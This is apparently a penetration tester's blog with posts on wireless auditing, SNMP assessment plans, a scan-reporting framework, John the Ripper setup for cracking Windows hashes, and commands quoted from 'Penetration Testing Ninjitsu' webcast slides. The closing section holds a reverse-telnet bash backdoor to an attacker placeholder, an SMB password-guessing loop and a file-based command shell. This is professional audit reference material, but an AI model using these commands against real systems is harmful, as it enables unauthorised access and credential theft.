I created a tutorial on how to setup and configure the Nokia N810 Internet Tablet to conduct a wireless assessment or audit. The tools included in the tutorial include how to setup kismet (oldcore and newcore), aircrack-ng (airbase and aircrack), and btscanner. I’m still working on developing steps to install Metasploit and Karmetasploit for wireless client attacks. The tutorial also details using the internal GPS as well as adding an external wireless adapter. The latest version of the tutorial can be found here.
Sep 082011
Jun 072011
I put together another Technical Assessment Plan for assessing the SNMP protocol. You will use open source and freely download-able utilities to assess the SNMP protocol. This is for auditors that do not have access to or cannot afford the Solarwinds toolset. This is version 0.1 of the document and I plan on making updates and add new tools in the future.
May 022011
I created Project RF to have a reporting framework that provides consistent reports for various vulnerability scanning tools. The project started with support for Nessus back when I would parse nbe files. I’ve since included reporting for eEye Retina, Nmap, HP WebInpect, AppScan AppDetective, Kismet, and GFI Languard. This project is still in its alpha stages as I’m not a top notch web program developer. Scan results are exported to XML which is then uploaded, parsed, and imported into a backend MySQL database. I have found this framework very useful in generating reports for my workpapers. I still continue to work on this project even though I’m no longer an auditor. Recently I stripped it down to just Nessus and I rewrote the Nessus portion to support the .nesses v2 xml output. Installation and setup instructions can be found here.
This framework supports many options for report generation and executive reporting.
Feb 242011
I put together a Technical Assessment Plan that can be used to conduct external fingerprinting using the tools and utilities that a penetration tester would use. The assessment plans are structured in a way to help with the documentation of evidence for inclusion in a work-paper process. The plan provides helpful information on how to install, configure, and use the tools to obtain the evidence needed for an engagement. The Technical Assessment Plans that I have created can be found here.
A question was raised today during a presentation about what utilities you can use without installing them. There are engagements that the auditor is not allowed to use their own laptop and must use a laptop provided by the auditee. This severely limits how effective an engagement can be but it is not impossible to obtain the information you need when you connect to the auditee’s network. I’ve made changes to the Security Tools page to highlight which tools are stand-alone and do not require installation. Also for reference see Penetration Testing Ninjitsu which I pulled from a Core Security webcast.
Apr 172010
NA CACS conference hosted by ISACA (18-22 April 2010)
Remote Security Testing for Web Applications
Presented by David Rhoades
Maven Security Consulting
Attending this conference workshop session introduced me to Maven Security’s Web Security Dojo. This is a virtual image, Ubuntu based, that includes several free and open source tools used for web application auditing. The image also includes web application environments that are vulnerable to many common vulnerabilities to allow you to test and learn how to use the tools. This pre-configured environment is perfect for educational purposes. They also include a BASH script that will setup your own Ubuntu environment.
9.19.2011 – Updated for latest openssl and john jumbo patch on Ubuntu Natty Narwhal 11.4
Password cracking Windows hashes on Linux using John the Ripper (JtR). If you prefer the Linux operating system JtR is the password cracking utility to use. By default JtR does not support the hashes that we are interested in cracking. See below for installation and patching instructions for JtR. Applying the patch to JtR adds the functionality to crack NTLM and MS-Cache passwords. NOTE: This install was done on Ubuntu 10.4 LTS but should work on any Linux system since we are compiling from source.
$./john --format=mscash --rules --wordlist=<PASSWORD_LIST> <CACHE_HASH_FILE>
$./john --format=nt --rules --wordlist==<PASSWORD_LIST> <NTLM_HASHE_FILE>
For additional information you can read the JtR documentation and wiki from Openwall.
OpenSSL is needed. This can be installed through your package manager or may already be installed. Remember to install the development package (libssl-dev or libssl-devel). Instructions on download and compile are included below.
JtR 1.7.8
$ wget http://www.openssl.org/source/openssl-1.0.0e.tar.gz
$ tar zxvf openssl-1.0.0e.tar.gz
$ cd openssl-1.0.0e
$ ./config --openssldir=/usr/local
$ make
$ sudo make install
$ wget http://www.openwall.com/john/g/john-1.7.8-jumbo-5.tar.gz
$ tar zxvf john-1.7.8-jumbo-5.tar.gz
$ cd john-1.7.8-jumbo-5/
$ cd src/
$ make linux-x86-64
$ sudo make install
JtR 1.7.7
$ wget http://www.openssl.org/source/openssl-1.0.0d.tar.gz
$ tar zxvf openssl-1.0.0d.tar.gz
$ cd openssl-1.0.0d
$ ./config --openssldir=/usr/local
$ make
$ sudo make install
$ cd ..
$ wget http://download.openwall.net/pub/projects/john/1.7.7/john-1.7.7.tar.gz
$ tar zxvf john-1.7.7.tar.gz
$ cd john-1.7.7/
$ wget http://download.openwall.net/pub/projects/john/1.7.7/john-1.7.7-jumbo-6.diff.gz
$ gzip -d john-1.7.7-jumbo-6.diff.gz
$ patch -p1 < john-1.7.7-jumbo-6.diff
$ cd src/
$ make linux-x86-sse2
John will be found in the run directory.
http://www.openwall.com/john/g/john-1.7.7-jumbo-6.tar.gz
Jun 042009
I have created an updated configuration document for my Motion Computing m1300 wireless tablet. This document details getting Ubuntu 8.04 LTS Hardy Heron up and running on the tablet. Included in the documentation are the steps to get Kismet, Aircrack-ng, and Karmasploit up and running. Those steps will be helpful no matter what hardware you install Ubuntu on.
I have also created an updated configuration document for the setup of my Linux laptop that I use for penetration testing.
Dec 022008
Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (http://www.coresecurity.com/content/webcast-series-with-sans). I highly recommend listening to these web casts and downloading the slides for your reference. I’m including the commands extracted from the slides that can be very useful for a penetration test.
Ninjitsu I
Ping Sweep
C:\> for /L %i in (1,1,255) do @ping –n 1 10.10.10.%i | find “Reply”
Reverse DNS Lookup
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i
Dictionary Attack
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)
Ninjitsu II
Linux Command-Line Port Scanner
$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
Linux Command-Line Backdoor via “Reverse Telnet”
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
The Windows Command Line Port Scanner Using FTP Client
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
Windows Command-Line File Transfer
C:\> type [filename] > \\[machine]\[share]\[filename]
Backdoors: The File Shell
C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Ninjitsu III
Wireless Sniffing
C:\> for /L %i in (1,0,2) do @(netsh interface set interface “wireless network connection” disable & ping –n 3 127.0.0.1 >nul & netsh interface set interface “wireless network connection” enable & ping –n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)
Install Telnet Client Vista
C:\> pkgmgr /iu:"TelnetClient"
Install Telnet Server Vista
C:\> pkgmgr /iu:"TelnetServer"
Install IIS 7.0
C:\> pkgmgr /iu:IIS-WebServerRole;WASWindowsActivationService;WAS-ProcessModel;WASNetFxEnvironment;WAS-ConfigurationAPI
List Domain Password Settings
C:\>net accounts /domain